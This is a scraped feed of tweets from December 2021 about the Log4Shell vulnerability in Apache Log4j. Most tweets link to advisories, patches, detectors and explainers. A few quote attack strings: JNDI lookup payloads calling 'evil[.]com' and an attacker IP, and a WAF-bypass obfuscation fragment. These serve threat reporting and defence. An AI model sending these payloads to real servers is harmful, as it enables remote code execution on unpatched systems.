2021-12-20 15:11:23.@FortiGuardLabs Threat Signal Report: Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) →… https://t.co/o8S2e5JSDN https://twitter.com/i/web/status/1472945032235831300FortiMisti1
2021-12-20 15:10:12Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/WK72vBfkro https://dy.si/9DuCBxpbsellers
2021-12-20 15:00:34Dridex 22203 starts to spread via #Log4j (CVE-2021-44228). If you haven't deployed Feodo Tracker's Blocklist yet, i… https://t.co/VlklJlzi2M https://twitter.com/i/web/status/1472940745397084162abuse_ch
2021-12-20 15:00:28Microsoft Sentinel CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability. #sentinel… https://t.co/ZQZ2j6czqm https://twitter.com/i/web/status/1472941493400780805mrmubi
2021-12-20 15:00:16Our websites are Microsoft IIS based and not vulnerable to the recent Apache Log4j2 exploit (CVE-2021-44228). We ha… https://t.co/NzGS4zSYoO https://twitter.com/i/web/status/1472943951485231113WestMarchSys
2021-12-20 15:00:07Interesting Reading: Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/q2Y61CKTlD https://bit.ly/3EZClrIGFritchey
2021-12-20 15:00:05Recommendations for mitigating the log4j vulnerability (CVE-2021-44228) in IBM BPM and BAW products. #IBM #BPM… https://t.co/btInoqOI1D https://twitter.com/i/web/status/1472944516785131521apexbpm
2021-12-20 14:45:00I have been an Elasticsearch fan boi since the early beta releases but CVE-2021-44228 is determined to spoil things… https://t.co/9XZwpnEcSL https://twitter.com/i/web/status/1472938146228805637oliverpicton
2021-12-20 14:44:33CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j that can lead to remote code execution. #ApacheLog4j2… https://t.co/PH3GHo7Dup https://twitter.com/i/web/status/1472938461514530817MalWebHunter
2021-12-20 14:37:47Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/bqGIZzuWrM https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/senthenes
2021-12-20 14:34:58Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.8M (audience size) CVE-2021-45046: 823.8K CVE-2021-4… https://t.co/WMF9CvD9G6 https://twitter.com/i/web/status/1472929792949428225CVEtrends
2021-12-20 14:31:09The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/iTDMHgYPsk https://t.co/RFJb5R7YUm https://bit.ly/3EhjgA6whatsthetwitt
2021-12-20 14:04:06The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/kp8Qu8Dgpq https://t.co/O9JS5pkQGQ https://bit.ly/3J5lUwIdwood87
2021-12-20 14:03:46SELinux/iptablesとApache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228) | https://t.co/itNJpowKZR https://t.co/sDIXTK43mr http://security.sios.com https://ift.tt/3e8Oxurmagiauk
2021-12-20 14:03:08Experts are warning Windows users to update their computers after the "CVE-2021-44228” flaw in the software Apache… https://t.co/LzIrc9qu4Y https://twitter.com/i/web/status/1472928212145655809MarkoGulan
2021-12-20 14:02:52The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/hebQTpCNWX https://t.co/AvroyJjuDP https://bit.ly/32hzP1QMikeBur2k1
2021-12-20 13:59:20So we had a bypass in our #log4j / #log4shell / CVE-2021-44228 rule: Dominik Strecker from Swiss branch of… https://t.co/B6h6QG8BCE https://twitter.com/i/web/status/1472924968816103433CoreRuleSet
2021-12-20 13:54:38Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/bhkNxhZp2e https://dy.si/YhTGPrdjagadeesh
2021-12-20 13:40:56CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Perguntas frequentes sobre Log4Shell e vulnerabilidades associadas https://t.co/QsH1Hiu74K http://ow.ly/a0MG103ghGpdansantanna
2021-12-20 13:32:31CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/ohYkaIdOM0 https://twitter.com/i/web/status/1472920858557517825lizbeth_plaza
2021-12-20 13:31:37How to use a #canarytoken by @ThinkstCanary help test for CVE-2021-44228 (log4j/log4shell).… https://t.co/HAXpEEEQbx https://twitter.com/i/web/status/1472921130633625606infosec_advisor
2021-12-20 13:30:47@iriyak_playlive I'm sorry to be late. I would like to know the impact of CVE-2021-44228, CVE-2021-45046, CVE-2021-… https://t.co/gsTVBYoTvG https://twitter.com/i/web/status/1472922012297601026nino_1991_jp
2021-12-20 13:21:54Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vu… https://t.co/nZnNox2uCW https://twitter.com/i/web/status/1472918670640701440infosec_advisor
2021-12-20 13:21:45CVE-2021-44228 Remote Code Injection In Log4j https://t.co/rtAqsQalnc https://github.com/jas502n/Log4j2-CVE-2021-44228infosec_advisor
2021-12-20 13:12:26@iriyak_playlive I see. It looks good to read from CVE-2021-44228. https://t.co/hLihuwlZ4y https://logging.apache.org/log4j/2.x/security.htmlnino_1991_jp
2021-12-20 13:11:56@nino_1991_jp Ah got it now. Thank you. So you would like us to do assessment for CVE-2021-44228, right?iriyak_playlive
2021-12-20 12:50:46The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/4mQnyXly7q https://twitter.com/i/web/status/1472909698001162248maddog27629870
2021-12-20 12:50:37What is CVE-2021-44228 or Who the hell is Log4J? https://t.co/isV09L4DoC https://t.co/1rrCmQl2jw https://hubs.ly/Q010_XK00darronantill
2021-12-20 12:50:33What is CVE-2021-44228 or Who the hell is Log4J? by @IoT_Lockers https://t.co/iNhVHm6jgl https://t.co/7vN7g51alZ https://hubs.ly/Q010_SfQ0DeviceAuthority
2021-12-20 12:40:07The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/B7lqwE0VjR https://twitter.com/i/web/status/1472909332157243396maddog27629870
2021-12-20 12:30:54PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs https://t.co/HIthxntgpU #Log4Shell #CVE… https://t.co/ZuHYMPKEZ1 https://github.com/back2root/log4shell-rex https://twitter.com/i/web/status/1472903482139037700cybritexsec
2021-12-20 12:21:24urgent note setting out the current situation and advice on a critical cyber vulnerability, CVE-2021-44228, also kn… https://t.co/hH4JPVb62V https://twitter.com/i/web/status/1472904617428148230KICACare
2021-12-20 12:11:25#Log4Shell, #Log4j  En ce 20/12/2021 Un excellent article sur cette vulnérabilité. CVE-2021-44228. De… https://t.co/m1Amx83IYo https://twitter.com/i/web/status/1472901856083034120argevise
2021-12-20 11:54:36Apache Log4j modules now have 3 vulnerabilities associated with them - CVE-2021-44228, CVE-2021-45105, &amp; CVE-2021-4… https://t.co/nCT1lOEJCT https://twitter.com/i/web/status/1472894996688916480CswWorks
2021-12-20 11:51:25@1ZRR4H @AhmedMa07846126 Here is the list of IP addresses exploiting the #log4j #CVE-2021-44228 vulnerability, as r… https://t.co/P5EMi7OWhh https://twitter.com/i/web/status/1472896240643891201Crowd_Security
2021-12-20 11:50:40🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/cuIZBhgWzA https://twitter.com/i/web/status/1472896953449123841threatintelctr
2021-12-20 11:12:58#Log4Shell (CVE-2021-44228) is a new vulnerability in #Log4j, one of the most popular logging frameworks for Java.… https://t.co/RegZdzozan https://twitter.com/i/web/status/1472884986936233986intruder_io
2021-12-20 11:12:18Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/GrUz0FWPKc 2.17.0が出たぽよ… https://www.jpcert.or.jp/at/2021/at210050.htmlxerespm
2021-12-20 11:02:48Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/lJIFyP0b1W https://t.co/9aVqH7Zrm7 http://dlvr.it/SFjWN6nichii_a
2021-12-20 11:01:54jpcertによると、log4jの脆弱性は先述のCVE-2021-44228の他にも CVE-2021-45046とCVE-2021-45105の2つの脆弱性もあるみたい。 全ソフトウェア(一部ハードウェアも)で影響有無を確認する… https://t.co/1ptMSezrQX https://twitter.com/i/web/status/1472882380444954625neru01029390
2021-12-20 10:50:21log4jの脆弱性(CVE-2021-44228)やばすぎる… 今年も後わずかなのに、これの対応でデスマーチ中。 今年中に落ち着くのかなぁ…。 一般のPCユーザにも影響する可能性はあるから皆さん気を付けて https://t.co/GC8ouzwWe7 https://www.itmedia.co.jp/news/articles/2112/10/news157.htmlneru01029390
2021-12-20 10:41:08Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a #Log4Shell (CVE-2021-44228) ex… https://t.co/y9FaLat2pm https://twitter.com/i/web/status/1472878594288504832hack_git
2021-12-20 10:31:45Apache projects affected by log4j CVE-2021-44228 https://t.co/KvBLuZdcGL https://t.co/zN9zp5JFh8 https://lnkd.in/gUiw539i https://lnkd.in/gr_hsmnGOvidiuPismac
2021-12-20 10:31:30The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/00dCY19MAX https://twitter.com/i/web/status/1472874632252477440ArienneT1972
2021-12-20 10:30:17Log4j (CVE-2021-44228) https://t.co/edWByKof8tPatchFriday
2021-12-20 10:00:32DS8k hmc uses Apache Log4j which is subject to a vulnerability alert CVE-2021-44228. https://t.co/wC87GWcifU https://www.ibm.com/support/pages/node/6528280Sever_i
2021-12-20 10:00:11Le patch #log4j pour corriger CVE-2021-44228 a généré une nouvelle CVE (CVE-2021-45046) https://t.co/A1BukQLhju VM… https://t.co/QwrVopjy54 https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/ https://twitter.com/i/web/status/1472867827682099203xhark
2021-12-20 10:00:07This is my first bounty Log4Shell (CVE-2021-44228) **The best feeling** earned $5,800 for my submission on… https://t.co/g96LpAHffR https://twitter.com/i/web/status/1472867982594371586thearyansec
2021-12-20 09:48:33@nino_1991_jp 予行練習に一つお題をあげます。 ベトナムの開発パートナが開発しているソフトウェアシステムがJavaで開発されていたとしてlog4jの脆弱性 CVE-2021-44228, CVE-2021-45046… https://t.co/RkJ4q7bM3R https://twitter.com/i/web/status/1472861945359474694iriyak_playlive
2021-12-20 09:48:07Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 https://t.co/Zve3dQBrc4 #CyberSecurity… https://t.co/aDwgyDKd7n http://dlvr.it/SFjK6Z https://twitter.com/i/web/status/1472861975143075841reach2ratan
2021-12-20 09:43:06The Real Risk Of Operating Out-Of-Date Software: Software Security Advisory – CVE-2021-44228 Log4j2 Vulnerability… https://t.co/TnQWlQu8sh https://twitter.com/i/web/status/1472863049727950848voss_solutions
2021-12-20 09:25:19Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ‼️ Bypass WAF 12. Java date formatting converts ${${date:'j'}${date:'n'… https://t.co/hqL3rpgtIi https://twitter.com/i/web/status/1472857155225415683wugeej
2021-12-20 09:24:31CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/THsX8Bikwr https://twitter.com/i/web/status/1472857444241973249DanRaywood
2021-12-20 09:12:45List of IP addresses exploiting the #log4j #CVE-2021-44228 vulnerability, as reported by our network. (Updated seve… https://t.co/J0cbFElENb https://twitter.com/i/web/status/1472855628582469636Gustavmpunza94
2021-12-20 09:10:17There's Log4j Vulnerability (CVE-2021-44228) I found in PicsArt application 🥲NandanLohitaksh
2021-12-20 08:53:32📢 #Log4j Vulns ~ @1ZRR4H 1) CVE-2021-44228 (RCE) - Critical Payload: ${jndi:ldap://evil[.]com:1389/a} 2) CVE-2021… https://t.co/jQVNnBuIfd https://twitter.com/i/web/status/1472850400130723840zapstiko
2021-12-20 08:50:30Very good video on #Log4Shell @LiveOverflow Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/ZqqyntBOfL via @YouTube https://youtu.be/w2F67LbEtnkm42smith
2021-12-20 08:47:58This is my first bounty Log4Shell (CVE-2021-44228) **feel cool** earned $5,800 for my submission on… https://t.co/M1toIdR3Gn https://twitter.com/i/web/status/1472847182818525184thearyansec
2021-12-20 08:44:11vCENTER SERVER APPLIANCE - CVE-2021-44228 y CVE-2021-45046 - Remote code execution vulnerability via Apache Log4j… https://t.co/EAtau4P6TA https://twitter.com/i/web/status/1472847992616939521lifydouglaspain
2021-12-20 08:30:30Understanding Log4j Vulnerability CVE-2021-44228 | by Amal Ben Brahim | Dec, 2021 | Medium https://t.co/heAeo1KJ3r https://amal-benbrahim.medium.com/understanding-log4j-vulnerability-cve-2021-44228-c6376a9efc13Secnewsbytes
2021-12-20 08:01:11SW upgrade: Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Plus (CVE-2021-44228) https://t.co/fGBRP3NybG https://www.ibm.com/support/pages/node/6527828BlahaOndrej
2021-12-20 08:01:03SW upgrade: Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Scale (CVE-2021-44228) https://t.co/KCmtUPl0Rn https://www.ibm.com/support/pages/node/6528108BlahaOndrej
2021-12-20 08:00:57SW upgrade: Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Control (CVE-2021-44228) https://t.co/rE7FYjUKaB https://www.ibm.com/support/pages/node/6527086BlahaOndrej
2021-12-20 07:51:14Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/jkFeAi88sI https://dy.si/hsLGsBStuartGilks123
2021-12-20 07:40:27Citrix Security Advisory for Apache CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-20 07:40:16Log4Pot A honeypot for the #Log4Shell vulnerability (CVE-2021-44228). https://t.co/AIwO87wqv7 GitHub - thomaspatz… https://t.co/berDqRgIq8 https://github.com/thomaspatzke/Log4Pot https://twitter.com/i/web/status/1472833402357354497hack_git
2021-12-20 07:30:42Workaround instructions to address CVE-2021-44228 in Site Recovery Manager https://t.co/tP6TqwEdt6 https://dy.si/V3TGWCJPerformer
2021-12-20 07:30:40Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/geLo7SuDpl https://dy.si/1fJD5JPerformer
2021-12-20 07:27:00The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/JyywlKv2zk https://twitter.com/i/web/status/1472828172530028545velez1066
2021-12-20 07:16:59IBM SPSS Modeler の Apache Log4j の処理に任意のコードを実行される問題 (CVE-2021-44228) [40843] https://t.co/NivnVwA8Kx #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40843softek_jp
2021-12-20 07:15:40VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) VMSA-2021-00… https://t.co/8kCl4siten https://twitter.com/i/web/status/1472825230007889920makotoclimb
2021-12-20 07:14:51Afectación CVE-2021-44228 en servicios Microsoft https://t.co/1RSldAlUMC #vulnerability #java #log4j #microsoft https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/jvela
2021-12-20 07:01:55Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/0v6biogcbs ちょいちょい更新(;^ω^) https://www.intellilink.co.jp/column/vulner/2021/121500.aspxRC31E
2021-12-20 07:00:24IT Risk: Citrix.Vulnerability information for CVE-2021-44228 in Endpoint Management (Citrix XenMobile Server), Vir… https://t.co/qD9H1aZb2s https://twitter.com/i/web/status/1472824081087332355management_sun
2021-12-20 06:30:21Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog u… https://t.co/dBZ8Fe54aX https://twitter.com/i/web/status/1472816373034196994OvidiuPismac
2021-12-20 06:23:00@Bugcrowd 1: Log4j RCE CVE-2021-44228 &amp; Log4j RCE CVE-2021-45046 (we wanted all the attention) 2: Log4j CVE-2021-45105 DDoS (hi)BlankJinn
2021-12-20 06:22:46更新: 2021年12月20日記載 &gt; Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/lYLexXhTiv https://www.jpcert.or.jp/at/2021/at210050.htmlohhara_shiojiri
2021-12-20 06:10:49何度か更新されて追記が多くなってきた。 「2021-12-11(新規)」 「2021-12-20(更新)」 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/Pdk7gXck0B https://www.jpcert.or.jp/at/2021/at210050.htmlnilab
2021-12-20 06:01:42Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/JkRq9nJ8Ke https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/JOYDANTINE1
2021-12-20 05:50:52さらに更新。 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/nlv8fqfOFl https://www.jpcert.or.jp/at/2021/at210050.htmlsurblue
2021-12-20 05:42:12An update on the Apache Log4j CVE-2021-44228 vulnerability https://t.co/Swj7WwoJ3K https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/THashim60290313
2021-12-20 05:42:04Log4J-Detector – your file-system within any application that are vulnerable to CVE-2021-44228 and CVE-2021-45046… https://t.co/oaBhdEncda https://twitter.com/i/web/status/1472802589808992265CyberIQs_
2021-12-20 05:41:46注意喚起: Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 (更新) 2021-12-20T14:15+09:00 https://t.co/OORB6reATN 全確保支援士NEWS https://www.jpcert.or.jp/at/2021/at210050.htmlkai_ri_0001
2021-12-20 05:41:18Apache Log4jにおける脆弱性(CVE-2021-44228)に関する注意喚起を更新。「対策」「参考情報」を更新。The Apache Software Foundation等の情報を確認し、速やかな対策の実施をご検討くだ… https://t.co/WLNRcP560f https://twitter.com/i/web/status/1472803429370458112jpcert
2021-12-20 05:30:37Log4J-Detector - Detects Log4J versions on your file-system within any application that are vulnerable to CVE-2021-44228 and CVE-2021-45046squadpirates
2021-12-20 05:21:15Detector – Detects Log4J versions on your file-system within any application that are vulnerable to CVE-2021-44228… https://t.co/HMy78MicV8 https://twitter.com/i/web/status/1472797472636518400eshieldsecure
2021-12-20 05:20:48Log4j vulnerability CVSS details CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability affectin… https://t.co/jJOuqw76lp https://twitter.com/i/web/status/1472798241418743808h4md44n
2021-12-20 05:10:2212/19でリリースされたバージョンで、CVE-2021-44228とCVE-2021-45046が対応されているlog4j 2.16 が入ったバージョンがリリースされた。これで一旦一安心かな?CVE-2021-45105がやっぱ… https://t.co/6AxkhWCbCN https://twitter.com/i/web/status/1472794159140708352nohoyan
2021-12-20 04:22:25#CVE-2021-44228 #Log4j vulnerability is one of the most dangerous vulnerabilities ever. This 'exploit' is not over… https://t.co/iwGCXEzVUm https://twitter.com/i/web/status/1472782014919200771ekutukerREAL
2021-12-20 04:11:32ここまでaws側で対応してくれるのはマネージドサービスの強みだな。 CVE-2021-44228 Log4jの脆弱性のAWS環境への影響 - Qiita https://t.co/Xyx9BWGOOg https://qiita.com/tsukamoto/items/858f2bb863e75d4225c4ataru_mix
2021-12-20 04:00:18"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeEb9z Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-20 03:41:28Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 #cloudsecurity https://t.co/o7XDO7lXVx https://cloudsecurityalliance.org/articles/keeping-up-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/CLAVDIAmartin
2021-12-20 03:40:33#JobScheduler V.1.13.10リリース Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228, CVE-2021-45046)の対応に加え、多数のバグフィックスを含んでいますので、アップ… https://t.co/77YwEBYAOp https://twitter.com/i/web/status/1472772577680818182satoruf
2021-12-20 02:50:08先日発見され世間を賑わせているJavaのロギング用ライブラリ、Log4jの脆弱性(CVE-2021-44228)についての情報をお届けしています。 「Log4jの脆弱性(CVE-2021-44228)への各種セキュリティ製品の対応」 https://t.co/OeXBhrulYG https://note.com/logstare/n/nee8b1e38c095logstare
2021-12-20 01:42:27GitHub Trending Archive, 18 Dec 2021, Unknown. rwincey/CVE-2021-44228-Log4j-Payloads, snyk-labs/awesome-log4shell,… https://t.co/k08zZGulDI https://twitter.com/i/web/status/1472741059361132546motakasoft
2021-12-20 01:30:19기존 Apache Log4j 취약점 .. ① 원격코드 실행 취약점(CVE-2021-44228) ② 서비스 거부 취약점(CVE-2021-45046) ③ 원격코드 실행 취약점(CVE-2021-4104)… https://t.co/FGRpm53UV7 https://twitter.com/i/web/status/1472741041531133952mlmcorea
2021-12-20 01:11:19“Log4jの脆弱性(CVE-2021-44228,CVE-2021-45046)のVMware製品の対応状況について(12/20版) - ネットワールド らぼ” https://t.co/AgWI6KZiiN https://htn.to/4uWWGx4LMCwaiha8
2021-12-20 01:01:17Apache Log4j の脆弱性対策なら yamory(Log4Shell、CVE-2021-44228の対策) https://t.co/5OPyJqejTg https://yamory.io/blog/useful-functions-for-log4j-vulnerability/gakkiy
2021-12-20 00:50:35はい / “Notaで提供している各種サービスのApache Log4j に関する脆弱性(CVE-2021-44228)の影響について - Nota Developers' Blog” https://t.co/eCxDDGFZA3 https://htn.to/2Vm2LNuVa1yuiseki_
2021-12-20 00:40:44CVE-45046も追加されたため、全面的に内容を更新しました。 Log4jの脆弱性(CVE-2021-44228,CVE-2021-45046)のVMware製品の対応状況について(12/20版) https://t.co/qRutzKYiPb https://blogs.networld.co.jp/entry/2021/12/12/210529interto
2021-12-20 00:40:38Log4J 2 / Log4Shell の脆弱性に関するNotes、Domino、Verse、Traveler への影響 (CVE-2021-44228) | HCL Software (Japan) Blog 一部の製品が影響… https://t.co/bLAb6O9SSK https://twitter.com/i/web/status/1472726147867807744DXTodayJapan
2021-12-20 00:30:31#Log4Shell: vulnerabilidad crítica con exploit para #Log4j 2 (PARCHEA YA!) - Actualizado CVE-2021-44228… https://t.co/EpgA7Xhwjx https://twitter.com/i/web/status/1472724452936863744victor_hglz
2021-12-20 00:00:28Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. https://t.co/tiXY29oDe3 https://tryhackme.com/room/solarsyn_4ck
2021-12-20 00:00:27The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/oHJPVuI9Vi https://twitter.com/i/web/status/1472714666380079106velez1066
2021-12-20 00:00:06log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/evmvJy2pnS https://twitter.com/i/web/status/1472717924444303363moton
2021-12-19 23:51:04🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/Ci0tQVU5cu https://twitter.com/i/web/status/1472715759218536456threatintelctr
2021-12-19 23:43:19IP: 2.57.121.36 performing #Log4J CVE-2021-44228 Exploitation checks reverse-DNS: https://t.co/ya3utAYIvu jndi:ldap… https://t.co/wVNRo8lXYq http://smtp36.kcmoa.com https://twitter.com/i/web/status/1472711085824397322tolisec
2021-12-19 23:41:40#Log4j Remediation using #Fortinet #IPS DB version 19.217 this signature was set to drop by default. CVE-2021-44228… https://t.co/9bLBPXCLvP https://twitter.com/i/web/status/1472711719327879168pseixasgo
2021-12-19 23:33:15IT Risk: Apache.log4j2に複数の脆弱性(CVE増える) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44228management_sun
2021-12-19 23:31:06CVE 2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log... https://t.co/v5i48EE4tH 2021-… https://t.co/M6afxMy8P2 http://vulmon.com/vulnerabilitydetails?qid=CVE https://twitter.com/i/web/status/1472710567525687297VulmonFeeds
2021-12-19 23:23:08The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/MpNUW1VjY4 https://twitter.com/i/web/status/1472705947982249984velez1066
2021-12-19 23:22:49The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/7fFTa1KoKs https://twitter.com/i/web/status/1472706136658874376velez1066
2021-12-19 23:20:37🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ClSV6GtfjA https://twitter.com/i/web/status/1472708216174047237threatintelctr
2021-12-19 23:11:58CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-19 23:11:41Example CVE-2021-44228 payload: ${jndi:ldap://106.13.183.6:1343/Exploit} (🇨🇳) Path targeted: /solr/admin/collectio… https://t.co/YtRH20dOqp https://twitter.com/i/web/status/1472703713760346113bad_packets
2021-12-19 22:51:23本日のブログは、12/11に #JPCERT/CC が注意喚起した、 #Apache #Log4j の任意コード実行の #脆弱性 (CVE-2021-44228) について書きました。 オープンソースかどうかにかかわらず、外部のラ… https://t.co/VoyQYInMEu https://twitter.com/i/web/status/1472698758924279810crosslaboratory
2021-12-19 22:50:41Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/UkntpYcGNS https://www.intellilink.co.jp/column/vulner/2021/121500.aspxdexderrewedd447
2021-12-19 22:41:20👍 on @YouTube: Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/b79cwWbWrz https://www.youtube.com/watch?v=w2F67LbEtnkZerquix18
2021-12-19 22:30:21SIOSセキュリティブログを更新しました。 (iptablesのPoCを追記) SELinux/iptablesとApache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228)… https://t.co/6MV51MXZXG https://twitter.com/i/web/status/1472694851741548546omokazuki
2021-12-19 22:20:51A fully automated, accurate, and extensive scanner for finding #log4j RCE CVE-2021-44228 https://t.co/RkVbP4Wu95 https://github.com/fullhunt/log4j-scanRHJOfficial
2021-12-19 21:50:28.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/KBhUHMdkM2 https://twitter.com/i/web/status/1472684516099739659Woronka
2021-12-19 21:50:23PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs https://t.co/JR2xuIRhC4 #Log4Shell #CVE… https://t.co/ABpyd90McG https://github.com/back2root/log4shell-rex https://twitter.com/i/web/status/1472684640901251072ptracesecurity
2021-12-19 21:50:19Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/vnDorzEViC https://t.co/wwNZ9IiWwx http://dlvr.it/SFh8nmFreakBizarro
2021-12-19 21:30:41Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/pw0nvdkdxf https://dy.si/TgVRUmyVMX
2021-12-19 21:00:23An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/l6q9DIyNQb https://twitter.com/i/web/status/1472673045521350661ProductCERT
2021-12-19 20:53:31#Kubernetes #Automated | Apache Log4j2 CVE-2021-44228 node agent https://t.co/ExVJXUZh6k https://email.linuxfoundation.org/e3t/Btc/RI+113/cZw--04/VWVcC92MPFHWW6xqRWl794Tj3W8DFYQL4Cb58xN5XFYmZ3lLBZV1-WJV7CgBgzW38fd2j3jltPXVHsZ8K4P9VL8W8q-Jl387sxtHW46LRrc4K561nW5MBSB_5JVYkqW1RgmFT7TBVm7W3hl37Z8x_-wnW7LQ_qx8MRCtpW5R5gH_1gm0mwW1j-c9y7BpJ25W8V71jq29GDb8W1jXgG23X_gQvW46Q-qC4BJ4jrW1QF0P87XLyGWN6V3NyN_GpZSW6LvCMF3cK-QsW582XyR4cMV9_W2g8mRZ5RFpzsW1hn3Fs7BpXs_W8ktfxS712H7BW5VVsTS8fq89vN1XkKYKLQrdnW20RtK4894kS6W7wYp0C62VxszW5sqCKP6X82HkW7N0fNp1cFYqP35JS1hasdid
2021-12-19 20:53:12#Kubernetes #Automated | Scanning container images for CVE-2021-44228 https://t.co/IJAKJXNvAt https://email.linuxfoundation.org/e3t/Btc/RI+113/cZw--04/VWVcC92MPFHWW6xqRWl794Tj3W8DFYQL4Cb58xN5XFYmm3lLBmV1-WJV7CgHRtW52PKlX88dmSKW53pcz_1pwWPTW748tRV7p4PNFMSQG6kxcLgBW5hc4D_3BwSYJW5pNl8X1nbSY2W4gV35_1LGlXRW9hBm6J5d3gl_W3rh0cz1DyGqLVd3KrT4CXJ27W7kVT512mzlFsW2D2zr15VYkQXVKKzZz2Ph0WdW2VjTc1976QMMW1Mqvvj1-F0pzW5z8Rf-8FRDVfW6-b1CP8QgJ8pW7n6WsJ6K9YpSW5ZmsNd28SgCwW6xPtVf8bV20ZW7vPFX572TfY3W2k2YgP1dk9tg3nqm1hasdid
2021-12-19 20:31:08「ThreatMapperを使用してエクスプロイトを測定し、攻撃パスを列挙することで、Log4j2のエクスプロイトから組織を保護します」 「CVE-2021-44228:Log4j2の悪用可能性と攻撃パスの軽減」 https://t.co/RB5ccIC90I https://dzone.com/articles/cve-2021-44228-log4j2-exploitability-amp-attack-pafoxbook
